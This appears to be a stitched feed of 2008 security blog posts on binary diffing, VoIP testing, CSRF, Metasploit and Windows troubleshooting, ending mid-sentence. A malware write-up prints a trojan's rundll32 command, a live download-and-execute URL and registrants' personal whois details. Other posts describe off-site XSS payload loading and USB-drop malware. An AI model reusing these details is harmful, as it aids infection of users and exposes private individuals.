• And Dowd’s AS3 (oldschool technique with newschool application level impact)

Work like this serves as reminders that there is still a lot of unexplored landscape out there with plenty of good work waiting to be done regardless of how bleak the future might sometimes look for cool bugs. I look forward to “settling in” to work on some of the neat projects we have lined up here at Matasano and hopefully posting a bit here on the blog.

Hey all,

I forgot to mention a few things in the previous post:

1. We're going to release BinDiff v2.1 on the 15th of October 2008. This is still the "old" diffing engine, albeit with a number of speed & reliability improvements.
2. We're going to release BinNavi v2.0 on the 15th of October 2008. The number of new features in this release is huge -- it's really quite significant. You can read about it in detail on SP's blog.
   I will post some more information myself in the next days. Just a few mouth-watering keywords: Plugin API to extend Navi from Java/JRuby/Jython/JavaScript, built-in intermediate language, hierarchical tagging / namespaces for structuring large disassemblies, cross-module-graphing, managing multiple address spaces in one project, many user interface improvements, faster IDA->SQL export etc. etc. etc.
3. The DiffDeluxe engine will be part of the next BinDiff release thereafter, probably no later than February 2008. If you are an existing BinDiff customer and would like to try the DiffDeluxe engine in order to provide us with feedback, do not hesitate to contact us -- it's available for testing now. We're especially interested in finding instances where DiffDeluxe performs worse than BinDiff v2.1. Switching the core diffing engine is a significant change, and I would not want to know of any instances where the new engine is worse than the old one.

I am at Virus Bulletin in Ottawa -- if anyone wants to meet to see our new stuff, please drop mail to info@zynamics.com ! :)

It has been a while since I posted here -- partially because I had a lot of work to finish, partially because, after having finished all this work, I took my first long vacation in a ... very long while.

So I am back, and there are a number of things that I am happy to blog about. First of all, I now have in writing that I am officially an MSc in Mathematics. For those that care about obscure things like extending the euclidian algorithm to the ring of boolean functions, you can check the thesis here:
http://www.zynamics.com/files/Diplomarbeit.Thomas.Dullien.Final.pdf

For those that are less crazy about weird computational algebra: Our team here at zynamics has made good progress on improving the core algorithms behind BinDiff further. Our stated goal was to make BinDiff more useful for symbol porting: If you have an executable and you suspect that it might contain a statically linked library for which you have source access (or which you have analyzed before), we want BinDiff to be able to port the symbols into the executable you have, even if the compiler versions and build environments differ significantly, and even if the versions of the library are not quite the same.

Why is this important ? Let's say you're disassembling some piece of network hardware, and you find an OpenSSL-string somewhere in the disassembled image. Let's say you're disassembling an old PIX image (6.34 perhabs) and see the string

OpenSSL 0.9.5a 1 Apr 2000

This implies that PIX contains OpenSSL, and that the guys at Cisco probably backported any fixes to OpenSSL to the 0.9.5a version. Now, it would be fantastic if we could do the following: Compile OpenSSL 0.9.5a with full symbols on our own machine, and then "pull-in" these symbols into our PIX disassembly.

While this was sometimes possible with the BinDiff v2.0 engine (and v2.1, which is still essentially the same engine), the results were often lacking in both speed and accuracy. A few months back, Soeren and I went back to the drawing board and thought about the next generation of our diffing engine -- with specific focus on the ability to compare executables that are "far from each other", that differ significantly in build environments etc. and that only share small parts of their code. The resulting engine (dubbed "DiffDeluxe" by Soeren) is significantly stronger at this task.

Why did the original BinDiff v2 engine perform poorly ? There are a number of reasons to this, but primarily because of the devastating impact that a "false match" can have on further matches in the diffing process, and due to the fact that in the described scenarios, most of the executable is completely different, and only small portions match. The old engine had a tendency to match a few of the "unrelated components" of each executable, and these initial incorrect matches led to further bad matching down the road.

This doesn't mean the BinDiff v2 engine isn't probably the best all-round diffing engine you can find (I think it is, even if some early builds of the v2.0 suffered from silly performance issues -- those of you that are still plagued by this please contact support@ for a fix !) -- but for this particular problem some old architectural assumptions had to be thrown overboard.

Anyhow, to cut a long story short: While the results generated by DiffDeluxe aren't perfect yet, they are very promising. Let's follow our PIX/OpenSSL scenario:

DiffDeluxe operates with two "fuzzy" values for each function match: "Similarity" and "Confidence". Similarity indiciates how successful the matching algorithm was in matching basic blocks and instructions within the two functions, and confidence indicates how "certain" DiffDeluxe is that this match is a correct one. This is useful to sort the "good" and "bad" matches, and to inspect results before porting comments/names. Anyhow, let's look at some high-confidence matches:


Well, one doesn't need to be a rocket scientist to see that these functions match. But in many situations, the similarity between two functions is not 100% evident: The following is a matched function with only 72% similarity (but 92% confidence):



So what is the overall result ? Out of the 3977 functions which we had in libcrypto.so, we were able to match 1780 in our Pix disassembly -- but with a big caveat: A significant number of these have very low similarity and confidence scores. This isn't surprising: The differences between the compiler used upon compile time of our Pix image (sometime 6 years ago ?) and the compiler we used (gcc 4.1, -O3) is drastic. All in all, we end up with around 250 high-confidence matches -- which is not too bad considering that we don't know how many functions from OpenSSL the Pix code actually contains.

In order to have a more clear idea of how well these algorithms perform, we need an example of which we know that essentially the entire library has been statically linked in. For this, luckily, we have Adobe Reader :-)

With all the Adobe patches coming up, let's imagine we'd like to have a look at the Javascript implementation in Acrobat Reader. It can be found in Escript.api. Now, I always presume that everybody else is as lazy as me, so I can't imagine Adobe wrote their own Javascript implementation. But when Adobe added Javascript to Acrobat Reader, there were few public implementations of Javascript around -- essentially only the engine that is nowadays known as "SpiderMonkey", e.g. the Mozilla Javascript engine. So I compiled SpiderMonkey into "libjs.so" on my Linux machine and disassembled Escript.api. Then I ran DiffDeluxe. The result:

Escript contains about 9100 functions, libjs.so contains about 1900. After running the diff, we get 1542 matches. Let's start verifying how "good" these matches are. As discussed above, DiffDeluxe uses a "similarity" and "confidence" score to rate matches. We get 203 matches with similarity and confidence above 90% -- for these functions, we can more or less blindly assume the matches are correct. If we have any doubts, we can inspect them:





























Well, there is little question that this match was accurate.

The interesting question is really: How low can we go similarity- and confidence-wise before the results start deteriorating too badly ? Let's go low -- for similarities below 40%. For example the js_ConcatStrings match.






























Manual inspection of the screenshot on the right will show that the code performs equivalent tasks, but that hardly any instructions remain identical.

Proceeding further down the list of matches, it turns out that results start deteriorating once both confidence and similarity drop below 0.3 -- but we have around 950 matches with higher scores, e.g. we have successfully identified 950 functions in Escript.api. While this is signifcantly less than the 1900 functions that we perhabs could have identified, it is still pretty impressive: After all, we do not know which exact version of SpiderMonkey was used to compile Escript.api, and significant changes could have been made to the code.

Clearly, we're a long way from matching 95% -- but we're very close to the 50% barrier, and will work hard to improve the 50% to 75% and beyond :-)

Anyhow, what does all this have to do with automatic classification and correlation of malware ?

I think the drastic differences induced by platform/compiler changes make it pretty clear that statistical measures that do not focus on the structure and semantics of the executable, but on some "simple" measure like instruction frequencies, fail. All the time. Behaviorial methods might have a role to play, but they will not help you one bit if you acquire memory from a compromised machine, and are trivially obfuscated by adding random noisy OS interaction.

I am happy to kill two birds with one stone: By improving the comparison engine, I am making my life easier when I have to disassemble Pix -- and at the same time, I am improving the our malware classification engine. Yay :-)

Anyhow, as mentioned above: I am at the Virus Bulletin conference -- if anyone wishes to have a chat or have our products demo'ed, please do not hesitate to send mail to info@zynamics.com.

I have a confession to make.

I’m Deaf.  As in, American Sign Language is my native language along with English.  I don’t hear very well either, though I fake it pretty well.

I have also been working on Voice over IP security for a number of months.

Yes, you may laugh now.  A Deaf man working with VoIP.

---

In the past, I was relatively disinterested in the whole idea, until I was tossed onto a large scale VoIP assessment project.  After all, I would never use these systems being Deaf.  Little did I know that I was shutting myself out of a fascinating and byzantine world.

VoIP is just a method of streaming data, and signalling where the data is to go, over an IP network infrastructure.  That’s all.  There is nothing complicated about this.  The fact that it carries voice does not make it magical.  Data is data.

And it is for this reason that I was able to assess, manipulate and break VoIP components in interesting ways.  It is just data over a network that can be observed, and altered.

However, there were times when I had to use a VoIP hardphone to make calls and troubleshoot.  Speakerphone mode and the volume button came in handy.  There was also always grabbing the unwary coworker and asking him what the voice error message from the switch was.  Fortunately this was a very rare instance over the months long engagement.

---

While the concept of VoIP is inherently simple, infrastructure implementations are often not.  Large-scale enterprise infrastructure are on an entirely different scale from Joe User using Vonage on his DSL connection.  These enterpise VoIP solutions typically include a signalling proxy or gateway, voicemail servers, voice recognition switchboard, conferencing, E-911, and various other components.

On top of that, SIP is not the only lingua franca of VoIP.  There is also the Media Gateway Control Protocol, and Megaco, usually used for PSTN to IP or IP to IP networks.  Also used on the client end are Nortel’s UNISTIM and Cisco’s Skinny Client Control Protocol (SCCP).

Many of these protocols are derived from older digital switching stuff such as Signaling System 7.  And the mindset that comes from completely controlling the communications mechanism carries over, creating huge exposures.  These systems were never designed to be on an open untrusted network, and the inheritors of these legacy protocols are essentially digital switching carried over IP instead of the control channel of a T1.  There are plenty of issues to be found during testing because of this.

Not only that, but the telecommunications vendors are their own worst enemies. I had one vendor, when provided with a Unix-based system that had been hardened and secured, to install their management tools on, they insisted on an unsecured vanilla installation.  They refused to consider installing on anything but a virgin operating system.  Unsurprisingly, in the security audit that followed, the system completely failed.

With another vendor, I found severe issues in their SIP stack by fuzzing with the protos test suite.  When confronted with this, their answer was to use a SIP proxy or firewall, because the system was never meant to be talking SIP with anything but the trunking server.  They were not willing to put in the engineering effort to harden their SIP stack.

To these telecommunications vendors, despite being on an IP based network, security is a feature, not a core requirement.

---

VoIP is a wild and byzantine world! Join in, and help make it a better place.  If I can do this, so can you — here’s some tips to get started:

• Use a fuzzer.  Matasano Security uses our own Ruby framework, Ruckus, to define protocol fields and headers.  Until we release it, you might use peach fuzzer, sulley, or spike.
• Read a lot of RFCs.  I read hundreds of pages of RFCs until my eyes bled.
• Get intimately familiar with Wireshark.  Wireshark was a huge help in allowing us to write our own custom implementations of the VoIP protocols.  The dissector source code is rather handy.  Use other people’s work, don’t reinvent the wheel!
• A general purpose TCP/UDP switchboard proxy is also very helpful.  We typically start with just proxying.  And then as we understand the protocol more and more and implement it, the stream can be redirected through our Ruckus implementation for testing and debugging.
• Remember: VoIP is data and signalling of how the data gets there.  Think of how to suborn the switching.  Can we spoof a signal?  Can we redirect streams?

While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC who placed second had 13575 points, go us ;), I had an interesting thought; one of our attacks was a persistent xss attack that loaded it's payload from off-site so that we could gain some level of persistent control, however I realised that this attack would fail completely in the face of NoScript even if our xss succeeded since the person would not have our malicious domain whitelisted.

So, in light of that, I was thinking of how we could load our payload from off-site, without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS Filters (e.g. because the attack was persistent), but this information is particularly useful for persistent attacks when you may want to change the payload.

After thinking about this for a while, I realised that we've already solved the problem a while ago when we were talking about using TinyURL for data storage way back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course TinyURL would be of no use to us here as we are interested in being able to change our payload, however all it would require to be useful is (possibly some kind of synchronisation so that we execute in the order we want, rather than the order we get data back from our evil web server and) changing the URL to point to a domain you control.

Nothing really ground-breaking, but something interesting nonetheless.

This week’s edition of Risky Business is brought to you by Check Point and hosted by Vigabyte virtual hosting. Risky Business 80 was recorded at the second annual Kiwicon conference in Wellington, New Zealand.

In this podcast, you’ll hear the panel I ran at Kiwicon. Panelists were Insomnia Security’s Brett Moore, the University of Auckland’s Peter Gutmann and Security-Assessment.com’s Paul Craig.

You’ll also hear an interview with Mark “pipes” Piper about his latest initiative — secure-freedom.org. It’s a site designed to funnel knowledge from corporate security guys into the delicate little brains of open source developers.

This week’s sponsor interview features Check Point Software’s Steve MacDonald discussing recent changes to Australia’s EPL process.

This week's edition of Risky Business is brought to you by Check Point and hosted by Vigabyte virtual hosting. Risky Business 80 was recorded at the second annual Kiwicon conference in Wellington, New Zealand. In this podcast, you'll hear the panel I ran at Kiwicon. Panelists were Insomnia Security's Brett Moore, the University of Auckland's Peter Gutmann and Security-Assessment.com's Paul Craig. You'll also hear an interview with Mark "pipes" Piper about his latest initiative -- secure-freedom.org. It's a site designed to funnel knowledge from corporate security guys into the delicate little brains of open source developers. This week's sponsor interview features Check Point Software's Steve MacDonald discussing recent changes to Australia's EPL process.

Ed Felten and Bill Zeller recently released a very well-written paper about Cross-Site Request Forgery (CSRF), including some real-world vulnerability examples from ING Direct, YouTube, MetaFilter, and The New York Times. As you all know so well, CSRF vulnerabilities are easy find when you just decide to look on basically any website. Don't expect any ground breaking research per-say, but the papers content is really helpful to those unfamiliar with CSRF (and that's still a lot people - especially developers). Ed and Bill also did some work on a potential client-side solution, like LocalRodeo I think, which I hope to find time to investigate further. We need as many smart people as we can trying to solve this problem in creative ways. CSRF certainly isn't going to go away anytime soon.

Issue #18 of my favorite online magazine, (IN)SECURE, is now available for download. The magazine is consistently content rich, high quality, and best of all - free! ;) This issue has several articles on Web security, one of which was written by yours truly, "Browser Security: Bolt it on, then build it in." Obviously with software security this is the opposite of what you want things to work, but when you consider the business objectives of Web browser security this is the way it tends to work. Here’s an excerpt of the premise...

"Some vendors attempt an über secure design - Opus Palladianum as an example, but few use it. Others opt for usability over security, such as Internet Explorer 6, which almost everyone used and was exploited as a result. Then, somewhere in the middle, is fan-favorite Firefox. The bottom line is that any highly necessary and desirable security feature that inhibits market adoption likely won't go into a release candidate of a major vendor. Better to be insecure and adopted instead of secure and obscure."

Other compelling web security articles:

- Web application security: risky business?
- Secure web application development
- Enterprise application security: how to balance the use of code reviews and web application firewalls from PCI compliance.

Where would it be better to attack then where all the people trust each other?
A single individual or a group of individuals of which tracks lead to Turkish people and Chinese hosting or Chinese partners is spreading viruses though infected files and setup installations shared in vBulletin forums. It seems these individuals have a registration bot with captcha bypass mechanism for vBulletin 3.7.xx versions (may be other versions too) and they are using it to spread all kinds of malware.

I first found this when examining another Kaspersky 2009 installation located at:
http://www.httpshare.net/%E4%E5%F8%E3%E5%FA-%FA%E5%EB%F0%E5%FA-%7C-software-download/427522-kaspersky-antivirus-2009-full-34-p-ece-test-key-no-problem.html

The username spreading this message is “hakan_72_123″ and with a simple google search we can see:
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Ahe%3Aofficial&hs=sgc&q=hakan_72_123&btnG=Search

Hakan is not very shy to use the bot with his own name, go figure maby he is infecting thousands of forums manually?!
Anyway he in www.vbhackers.com/members/hakan_72_123/ which explains a lot

So what did he do? he took the time to upload Kaspersky 2009 to
http://rapidshare.com/files/115362254/Kaspersky_2009_Full_Sueruem_by_hakan.rar

Well I just checked and it has been 2 month since I found it and the bad guy extended the business for torrents too, this is the same virus under the title “Kaspersky Antivirus 2009 Full + Key [App][www.zonatorrent.com] “:
http://isohunt.com/download/44622492/kaspersky.torrent

Inside the rar there is a txt file with the text:

1- program demo deðil full sürümdür.

2- key girmek için þu sýrayý takip et
license-merge-activate using key-brovse= buradan keyleri
çýkarttýðýn klasörü seçip listenin en altýndakin üzerine çýft týklayýp
keyi gir.

HAZIRLAYAN: Hakan

www.avrasyaforum.net

What they did is instead of the standard shared .msi file, they put a WinRAR self-extracting archive with an icon of an msi file. They made the archive so that WinRar’s shell extension doesn’t recognize it as extractable. Once executed it drops a file called svchost.exe in “%ProgramFiles%\Outlook Express\” which is a refreshing path to drop a trojan downloader in
It executes the svchost.exe (compressed with MiniPE) which then executes
the trojan downloaded to %temp%\wmoptimizer.dll using rundll32.exe:

rundll32.exe “%temp%\wmoptimizer.dll”, RunSetup_Install

svchost.exe uses the classic URLDownloadToFileW and ShellExecuteW to download and execute: http://loansquotesinsurance.com/f/Resident.bin

These is the whois information for http://loansquotesinsurance.com:

Registration Service Provided By: Chinese DQ Network Tech Corp.
Contact: xixipai@hotmail.com

Domain name: loansquotesinsurance.com

Registrant Contact:
Shawn Lee
Shawn Lee

B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

Administrative Contact:
Shawn Lee
Shawn Lee (webmasters@loansquotesinsurance.com)
+86.02033875805
Fax: +86.02033875805
B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

Technical Contact:
Shawn Lee
Shawn Lee (webmasters@loansquotesinsurance.com)
+86.02033875805
Fax: +86.02033875805
B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

The email xixipai@hotmail.com also registers “http://3290.com”

Registration Service Provided By: Chinese DQ Network Tech Corp.
Contact: xixipai@hotmail.com

Domain name: 3290.com

Administrative Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng (xixipai@hotmail.com)
+1.05306260800
Fax: +299.05306260803
ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Technical Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng (xixipai@hotmail.com)
+1.05306260800
Fax: +299.05306260803
ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Registrant Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng

ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Well this is the part where I can only say, if you are reading this and in some kind of cyber police, DO SOMETHING!!!

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

I’m already back in the airport after a long day over at the world OWASP conference in New York. Among other things that were noteworthy was some extremely tacky marketing schwag from the ISC2 folks that says, “I fill the holes in your SLC”. I feel dirty having even typed that. I wish I were kidding. Ridiculous pictures of Dave Aitel wearing said schwag may or may not end up online in the near future. In the meantime, I wanted to do a brief overview on where we are and how things are progressing.

Jeremiah and I gave a brief talk yesterday outlining the timeline of events, and high level concepts of what was going on. We didn’t talk specifics other than some personal remediation advice - yes Lynx is your friend. I felt really lame giving a speech saying I wasn’t giving a speech, trust me. This was not a career highlight, by any stretch. Hence the self flagellation of telling everyone to loose a volley of squishy OWASP balls at me. I missed most of the volley in the picture I took of it, but you can still clearly see several of the OWASP balls in flight:

Jeremiah and I answered quite a few questions from the audience before, during and after the speech, and I’m sure a number of people are already working on their own versions of what they think we’re up to, given that a number of people were quick to tell us they were working on some demo code of some aspects of their interpretation of what we were talking about. I’m sorry to be vague, I really am.

Lastly, we did tell the audience that we will most likely be releasing a whitepaper on the informer’s website of Hackers for Charity prior to doing our full announcement (maybe a week or so before). It’s just a nice thing to do for kids, and we totally support Johnny Long’s efforts. Please sign up. It’s a good cause. If you must know the details and are too cheap to help kids in third world countries or you happen to be a kid in a third world country, I’m sure it will leak out in other ways and we’ll also post the whitepaper publicly later as well.

So, no time line still as of yet, but we are getting regular updates from Adobe and we’re confident they are being as expeditious as they can without risking introducing other issues in the process of issuing their fix. We’ll keep you updated.

This special edition of Risky Business was recorded in Rotterdam, in the Netherlands, at the GOVCERT.NL security conference. The conference organisers flew me there to host a couple of ask the expert sessions and record some custom interviews… but I got to record my own stuff too and prepare this special.

This podcast is essentially a bunch of interviews I did at the conference, glued together for your listening pleasure. Big thanks to our advertiser MessageLabs for making this week’s show possible!

On this week’s show you’ll hear:

• Marcus Sachs of the Internet Storm Centre (Day job: Verizon) talks supply chain subversion and fun with USB devices. (Hint: Load them up with malware then leave them in the bathrooms of your target…)
• GovCERT’s Carol Overes talks HoneySpiders — they’re basically client-side honeypots, but they could have some nifty commercial applications.
• Lance Spitzner looks back at his experience running the Honeynet Project over the years. Honeynets showed some early promise as potential products, ala “bait and switch honeynets”. It never happened, so I asked Lance why.
• A quick interview with Bart Jacobs, the professor who wound up leading the research team that broke NXP Semiconductors’ MIFARE RFID access cards. The whole thing has actually turned into a political catastrophe that has potential to divert votes away from the incumbent government…

Massive thanks to all the GOVCERT guys — Eelco, Roeland, Tarik and especially Erik de Jong. Apologies if I spelled any of your freakish European names incorrectly… Coming from Australia I know plenty of alcos, but not too many Eelcos!

This special edition of Risky Business was recorded in Rotterdam, in the Netherlands, at the GOVCERT.NL security conference. The conference organisers flew me there to host a couple of ask the expert sessions and record some custom interviews... but I got to record my own stuff too and prepare this special. This podcast is essentially a bunch of interviews I did at the conference, glued together for your listening pleasure. Big thanks to our advertiser MessageLabs for making this week's show possible! On this week's show you'll hear: Marcus Sachs of the Internet Storm Centre (Day job: Verizon) talks supply chain subversion and fun with USB devices. (Hint: Load them up with malware then leave them in the bathrooms of your target...) GovCERT's Carol Overes talks HoneySpiders -- they're basically client-side honeypots, but they could have some nifty commercial applications. Lance Spitzner looks back at his experience running the Honeynet Project over the years. Honeynets showed some early promise as potential products, ala "bait and switch honeynets". It never happened, so I asked Lance why. A quick interview with Bart Jacobs, the professor who wound up leading the research team that broke NXP Semiconductors' MIFARE RFID access cards. The whole thing has actually turned into a political catastrophe that has potential to divert votes away from the incumbent government... Massive thanks to all the GOVCERT guys -- Eelco, Roeland, Tarik and especially Erik de Jong. Apologies if I spelled any of your freakish European names incorrectly... ;) Coming from Australia I know plenty of alcos, but not too many Eelcos!

Silence can mean one of two things - the project is dead, or we are working on some really big things and aren't quite ready to announce them. Well, the project is not dead :-) In the next two weeks, some major changes will be announced that cover the source code, development team, and licensing of the Metasploit Framework. Folks who have been following the development tree may not be suprised, but we are taking some giant steps forward from the 3.1 release.

In the meantime, users should stay away from Ruby 1.8.7. Over the last few months, more and more OS distributions have been upgrading their standard Ruby interpreters from 1.8.5/1.8.6 to 1.8.7. Unfortunately, this version broke the ability to use short-name constants. This type of code is scattered throughout the Metasploit Framework and is tricky to track down. Even knowing what the problem is, there is no clean workaround that doesn't throw out the benefits of using short-name constants in the first place (which are used to make code readable among other things). How can you tell if you hit this bug? The error below is just one example:

[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

In the short-term, the framework will display a warning message if the interpreter version matches "1.8.7". Once the Ruby team pushes a new version that incorporates the patch (which is already in the stable development tree), this warning will be removed, and a more complex check will be put in place instead.

If anyone is looking for a deeper understanding of the framework and many of the new features, there are still a few seats left in my Powersploitation class at the SecTor 2008 Security Conference. You can tell the class material is fresh when the code it refers to is still being written ;-)

A few weeks ago my wife complained that her Vista desktop was not responding to her typing or mouse clicks. Given the importance of the customer, I immediately sat down at the system to troubleshoot.  It wasn’t completely hung, but extremely sluggish. For example, the mouse moved and when I clicked on the start button the start menu opened after about 30 seconds. I suspected that something was hogging the CPU and likely could have resolved the problem simply by logging off or rebooting, but knew that if I didn’t determine the root cause and address it, she’d likely be calling on my technical support services again in the near future. In any case, stooping to that kind of troubleshooting hack is beneath my dignity. I therefore set out to investigate.

My first step was to run Process Explorer to see which process was using the CPU. After a few minutes Process Explorer finally appeared and showed that not one, but two processes were involved, each consuming 50% of the CPU: Iexplore.exe and Dllhost.exe. Iexplore is Internet Explorer (IE) and I suspected that IE itself wasn’t the problem, but that it was a browser helper object (BHO), ActiveX control, or some other plugin loaded into IE. Similarly, Dllhost.exe is the host process for out-of-process COM server DLLs, so it was probably not at fault, but the COM server loaded into it. Both required digging deeper and I decided to tackle IE first.

In order to try and get some CPU headroom in which to operate, I suspended the Dllhost process by selecting it in Process Explorer, right-clicking to open the process context menu, and selecting the Suspend entry:

 

That put the Dllhost process to sleep and, as I expected, that freed up 50% of the CPU. That’s because the computer was a dual-core system and so to consume 100% of the available CPU cycles a process would have to have two threads, each hogging one of the cores. Most bugs I've seen that result in the CPU being pegged are caused by a single thread.

Processes don’t execute code, threads do, so I needed to look inside the IE process to see what thread or threads were running. I double-clicked on Iexplore.exe in Process Explorer to open its process properties dialog and switched to the Threads page. Several threads were running, but one was dominating the CPU:

 

From past experience I knew that Ieframe.dll was part of IE, but to be sure I clicked on the modules button on the stack dialog and switched to the Details page of the resulting Shell properties dialog:

 

The description didn't give me a clue as the thread's specific purpose, so I moved to the second clue about the thread, its start function. Because I had configured Process Explorer to retrieve symbols for Windows images from the Microsoft symbol server in Options->Configure Symbols, Process Explorer showed the name of the function where each thread began executing. Sometimes the DLL or function where a thread starts executing is enough to identify the thread’s purpose or the software causing a problem. In this case, the thread began in a function named CTablWindow::_TabWindowThreadProc. The function name hints that it’s the one in which the main thread of a tab starts running, but that still wasn’t enough to tell me why the thread was running so much; I needed to dig even deeper and look inside the thread to see where it was executing.

To look at what the thread was up to, I double-clicked on it in the Threads list to open the Thread Stack dialog, which shows the functions on the thread’s stack. A stack is essentially an execution history, where each function listed called the one above it on the list and the function at the top of the list is the one most recently executed by the thread at the time of Process Explorer looks at the stack. I scrolled through the list, looking for frames that referenced 3rd-party DLLs or Microsoft IE plugins, since they would be far more likely to have a bug than IE’s own code. Sure enough, I found frames pointing at a popular 3rd-party ActiveX control, Adobe Flash:

Just to be sure that I hadn’t happened to catch Flash running when a different component was using most of the CPU time, I closed and reopened the stack dialog several times, but all of them pointed at Flash.

The first thing I do when I suspect that some software is causing a problem is to check the vendor’s web site to make sure that I have the latest version. I opened the Process Explorer DLL view and looked at Flash.ocx’s version, went to Adobe’s site and looked at the version of the current Flash download, and they were the same. 

I was at a dead end. I couldn’t know for sure if Flash had a bug or, more likely, there was a Flash application that had a bug, nor could I be sure that the problem wouldn’t recur. I tried to determine which site was hosting the Flash content by closing tabs one by one, but when I had close them all the thread was still running.

At this point the only options I had were to uninstall Flash and leave my wife with a degraded web experience, or terminate IE to stop the current CPU usage and hope that it wouldn’t happen again. I chose the latter and the case remains open. Since investigating this I’ve seen the same Flash behavior again on my wife’s system and on my own, so have been vigilantly watching the Adobe site for a new version just in case its due to a bug in Flash itself. I was disappointed that there was no actionable result of the investigation, but at least I knew what had caused the CPU usage.

I now turned my attention the Dllhost problem with the hope that I'd meet with better success. Process Explorer lists in a tooltip the component or components loaded into hosting processes like Svchost.exe (the Windows service host process), Rundll32 (the Control Panel applet hosting process), Taskeng.exe (the scheduled task hosting process on Vista and Server 2008), and Dllhost.exe. I moved the mouse over Dllhost.exe to see what COM server it was running:

It was running the Thumbnail Cache COM server, whose job it is to create Explorer thumbnails for image and media files. It is part of Windows, so once again I had to look inside the process for more clues. I resumed the D